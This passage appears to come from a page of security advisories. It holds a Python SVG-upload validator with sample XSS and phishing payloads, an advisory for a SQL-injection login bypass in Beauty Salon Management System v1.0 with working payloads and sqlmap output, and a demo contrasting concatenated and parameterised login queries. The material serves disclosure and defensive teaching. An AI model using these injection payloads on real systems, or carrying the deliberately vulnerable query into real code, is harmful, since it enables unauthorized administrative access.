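"""Reject SVG uploads that carry script, event handlers, links or a DOCTYPE.

Added example for the SPIP (clickable logo), PrestaShop and OpenCMS (script
inside an SVG) advisories above; it is not code from any of those projects.
The sample documents are constructed to mirror the advisories' payloads.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
# Elements with no place in a logo or product-image upload.
FORBIDDEN_TAGS = {"script", "a", "foreignObject", "set", "animate", "handler", "iframe", "embed", "object"}
# Link attributes; only same-document fragments (#id) are tolerated.
HREF_ATTRS = {"href", f"{{{XLINK_NS}}}href"}


def local_name(qualified: str) -> str:
    """'{namespace}tag' -> 'tag'."""
    return qualified.rsplit("}", 1)[-1]


def svg_findings(data: bytes) -> List[str]:
    """Reasons to reject the upload; an empty list means it passed."""
    if b"<!DOCTYPE" in data or b"<!ENTITY" in data:
        # Rejected before parsing so entity-expansion tricks never reach expat;
        # a static image needs neither a DTD nor entities.
        return ["doctype-or-entity"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not-well-formed:{exc}"]
    findings = []
    if root.tag != f"{{{SVG_NS}}}svg":
        findings.append("root-is-not-svg")
    for el in root.iter():
        tag = local_name(el.tag)
        if tag in FORBIDDEN_TAGS:
            findings.append(f"element:{tag}")
        for attr, value in el.attrib.items():
            name = local_name(attr)
            if name.lower().startswith("on"):          # onload, onerror, onclick, ...
                findings.append(f"event-handler:{tag}@{name}")
            elif attr in HREF_ATTRS and not value.strip().startswith("#"):
                findings.append(f"external-reference:{tag}@{name}={value.strip()}")
    return findings


def is_safe_svg(data: bytes) -> bool:
    return not svg_findings(data)


# Constructed samples mirroring the three advisories, plus a benign file.
SAMPLES: Dict[str, bytes] = {
    # SPIP-style: a "logo" that is really a link to an attacker-chosen page.
    "link_logo": b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
                 b'<a xlink:href="https://phish.example/"><text x="40" y="20">Please click the logo</text></a></svg>',
    # PrestaShop/OpenCMS-style script element (their DOCTYPE header is checked separately below).
    "script": b'<svg xmlns="http://www.w3.org/2000/svg"><polygon points="0,0 0,50 50,0"/>'
              b'<script type="text/javascript">alert(document.location);</script></svg>',
    "onload": b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"><rect width="1" height="1"/></svg>',
    "doctype": b'<?xml version="1.0"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" '
               b'"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg xmlns="http://www.w3.org/2000/svg"/>',
    "clean": b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10"><defs><linearGradient id="g">'
             b'<stop offset="0"/></linearGradient></defs><rect width="10" height="10" fill="url(#g)"/></svg>',
}


def check_all() -> Dict[str, List[str]]:
    return {name: svg_findings(data) for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for name, findings in check_all().items():
        print(f"{name:10} {'OK' if not findings else ', '.join(findings)}")
```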
            
# Exploit Title: Beauty Salon Management System v1.0 - SQLi
# Date found: 04/07/2023
# Exploit Author: Fatih Nacar
# Version: V1.0
# Tested on: Windows 10
# Vendor Homepage: https://www.campcodes.com
# Software Link: https://www.campcodes.com/projects/beauty-salon-management-system-in-php-and-mysqli/
# CWE: CWE-89

Vulnerability Description -

Beauty Salon Management System: V1.0, developed by Campcodes, has been
found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability
allows an attacker to manipulate login authentication with the SQL queries
and bypass authentication. The system fails to properly validate
user-supplied input in the username and password fields during the login
process, enabling an attacker to inject malicious SQL code. By exploiting
this vulnerability, an attacker can bypass authentication and gain
unauthorized access to the system.

Steps to Reproduce -

The following steps outline the exploitation of the SQL Injection
vulnerability in Beauty Salon Management System V1.0:

1. Open the admin login page by accessing the URL:
http://localhost/Chic%20Beauty%20Salon%20System/admin/index.php

2. In the username and password fields, insert the following SQL Injection
payload shown inside brackets to bypass authentication for the username
parameter:

{Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374
ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign
In}

3. Execute the SQL Injection payload.

As a result of successful exploitation, the attacker gains unauthorized
access to the system and is logged in with administrative privileges.

Sqlmap results:

POST parameter 'username' is vulnerable. Do you want to keep testing the
others (if any)? [y/N] y

sqlmap identified the following injection point(s) with a total of 793
HTTP(s) requests:

---

Parameter: username (POST)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)

Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374
ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign
In

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: username=admin' AND (SELECT 1468 FROM (SELECT(SLEEP(5)))qZVk)--
rvYF&password=test&login=Sign In

---

[15:58:56] [INFO] the back-end DBMS is MySQL

web application technology: PHP 8.2.4, Apache 2.4.56

back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
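The Beauty Salon login bypass above, and the WP AutoComplete bug earlier on this page, are the same defect: request parameters spliced into SQL text. This added example (not either project's code) replays the advisory's username payload against a concatenated query and against a parameterised one, on an in-memory SQLite table with one constructed admin row.

```python
"""A login query built by string concatenation beside its parameterised form.

Added example for the Beauty Salon Management System and WP AutoComplete
advisories above; it is not either project's code. It uses an in-memory
SQLite database with one constructed admin row; BYPASS is the username value
from the Beauty Salon advisory.
"""
import sqlite3

BYPASS = ("admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374 "
          "ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh")


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Plaintext password only to keep the focus on the query; real code stores a hash.
    db.execute("INSERT INTO admin (username, password) VALUES ('admin', 'correct-horse')")
    return db


def login_vulnerable(db: sqlite3.Connection, username: str, password: str) -> bool:
    """The advisories' bug class: request parameters spliced into the SQL text.

    With BYPASS as the username the statement becomes
    ... WHERE username='admin' AND 6374=(...)-- vqBh' AND password='test'
    so the password clause is commented out and the admin row comes back.
    """
    sql = f"SELECT id FROM admin WHERE username='{username}' AND password='{password}'"
    return db.execute(sql).fetchone() is not None


def login_fixed(db: sqlite3.Connection, username: str, password: str) -> bool:
    """Placeholders: the driver passes the values separately from the SQL text,
    so nothing the user typed is ever parsed as SQL."""
    sql = "SELECT id FROM admin WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone() is not None


def demo() -> dict:
    db = make_db()
    return {
        "vulnerable_bypassed": login_vulnerable(db, BYPASS, "test"),
        "fixed_bypassed": login_fixed(db, BYPASS, "test"),
        "fixed_valid_login": login_fixed(db, "admin", "correct-horse"),
        "fixed_wrong_password": login_fixed(db, "admin", "test"),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:22} {outcome}")
```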